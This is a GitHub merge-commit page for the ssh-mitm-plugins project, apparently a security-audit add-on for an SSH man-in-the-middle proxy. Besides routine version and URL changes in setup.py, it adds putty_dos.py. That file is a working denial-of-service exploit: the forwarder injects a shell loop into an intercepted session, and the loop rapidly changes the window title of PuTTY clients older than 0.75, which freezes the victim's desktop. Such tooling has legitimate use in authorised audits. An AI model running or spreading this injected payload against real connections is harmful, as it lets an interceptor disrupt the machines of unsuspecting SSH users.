Merge branch 'develop' into main

ssh-mitm · May 21, 2021 · 6b1d98e · 6b1d98e
2 parents 5731990 + 81fc167
commit 6b1d98e
Show file tree

Hide file tree

Showing 3 changed files with 33 additions and 5 deletions.
diff --git a/setup.py b/setup.py
@@ -19,19 +19,19 @@ def get_entry_points():
 
 setup(
     name='ssh-mitm-plugins',
-    version='0.2',
+    version='0.3',
     author='Simon Böhm',
     author_email='support@ssh-mitm.at',
     description='advanced features for ssh-mitm server',
     long_description=long_description,
     long_description_content_type='text/markdown',
     keywords="ssh proxy mitm network security audit plugins features advanced",
     packages=find_packages(),
-    url="https://github.com/The5imon/ssh-mitm-plugins",
+    url="https://github.com/ssh-mitm/ssh-mitm-plugins",
     project_urls={
         'Documentation': 'https://ssh-mitm-plugins.readthedocs.io',
-        'Source': 'https://github.com/The5imon/ssh-mitm-plugins',
-        'Tracker': 'https://github.com/The5imon/ssh-mitm-plugins/issues',
+        'Source': 'https://github.com/ssh-mitm/ssh-mitm-plugins',
+        'Tracker': 'https://github.com/ssh-mitm/ssh-mitm-plugins/issues',
     },
     python_requires='>= 3.6',
     classifiers=[

diff --git a/ssh_mitm_plugins/__entrypoints__.py b/ssh_mitm_plugins/__entrypoints__.py
@@ -2,7 +2,8 @@
     'SSHBaseForwarder': [
         'scriptedshell = ssh_mitm_plugins.ssh.scriptedshell:SSHScriptedForwarder',
         'stealthshell = ssh_mitm_plugins.ssh.stealthshell:SSHStealthForwarder',
-        'injectorshell = ssh_mitm_plugins.ssh.injectorshell:SSHInjectableForwarder'
+        'injectorshell = ssh_mitm_plugins.ssh.injectorshell:SSHInjectableForwarder',
+        'puttydos = ssh_mitm_plugins.ssh.putty_dos:SSHPuttyDoSForwarder'
     ],
     'SCPBaseForwarder': [
 

diff --git a/ssh_mitm_plugins/ssh/putty_dos.py b/ssh_mitm_plugins/ssh/putty_dos.py
@@ -0,0 +1,27 @@
+from ssh_proxy_server.forwarders.ssh import SSHForwarder
+
+
+class SSHPuttyDoSForwarder(SSHForwarder):
+    """PuTTY < 0.75: DoS on Windows/Linux clients
+
+    Security fix: a server could DoS the whole Windows/Linux GUI by telling
+    the PuTTY window to change its title repeatedly at high speed.
+
+    PuTTY-Changelog: https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html
+    """
+
+    def __init__(self, session):
+        super().__init__(session)
+        self.exploit = [
+            "PS1=''",
+            "while :",
+            "do",
+            "echo -ne '\\033]0: NEW_TITLE${RANDOM} \\007'",
+            "done"
+        ]
+        self.executed = False
+
+    def forward_extra(self):
+        if not self.executed:
+            self.server_channel.sendall('\n'.join(self.exploit) + '\n')
+            self.executed = True